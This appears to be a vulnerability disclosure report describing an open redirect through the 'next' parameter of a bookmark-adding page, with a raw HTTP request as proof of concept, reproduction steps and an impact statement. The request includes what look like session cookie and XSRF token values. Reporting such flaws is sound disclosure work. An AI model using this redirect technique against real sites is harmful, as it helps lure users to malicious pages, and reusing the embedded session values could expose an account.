Description

Open Redirect at add url with parameter ?next=

Proof of Concept

// PoC.request
POST /api/add HTTP/2
Host: esp.ae8.org
Cookie: _SESSION=t0+3lyA0gi4m/WOulD20ZJpY+2nW6ePHcVdc+I8Q+XV5W2b9qkCTm9/L9zYKNYg+rG7YmGyRg7SSZnGGG8NcZlrvXly7uPAUFtXaU+NzgjFoAwV8VSKA6KjB3JKwVxarCcSfW519/RjCDJJpq0ZBguQqPm4qF+dbAdIzAiP5XogmlVajF+8k9+UqxvpbGkZ6e3VGBdhOi44wL/AfySUfkxpro+yEVfeeBrLi3wefGrt4/SyZYivwQql8QocZQ/J2+p5UegTvYByqQlD8obT1p4BrmFecBq07y1KGpXDw+u76m4zF3NPw2pUJVKMD1rolqu3r+c/Z7htvP4A=; XSRF-TOKEN=rK2UKn5OcYHo0nsPw8jOP5YR99BDb84wsCXxyaQ0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Xsrf-Token: rK2UKn5OcYHo0nsPw8jOP5YR99BDb84wsCXxyaQ0
Content-Type: application/json
Content-Length: 183
Origin: https://esp.ae8.org
Referer: https://esp.ae8.org/add?next=https://google.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"url":"http://test.com","toread":null,"title":"Home - Test.com","time":null,"tags":null,"slug":null,"selected":null,"private":false,"description":"test","bid":null,"archiveUrl":null}

Step to Reproduct

Access add url with url : https://esp.ae8.org/add?next=https://google.com

After create success it will redirect to google.com

Impact

This functionality is not restricted to relative URLs within the application and could be leveraged by an attacker to fool an end user into believing that a malicious URL they were redirected to is valid.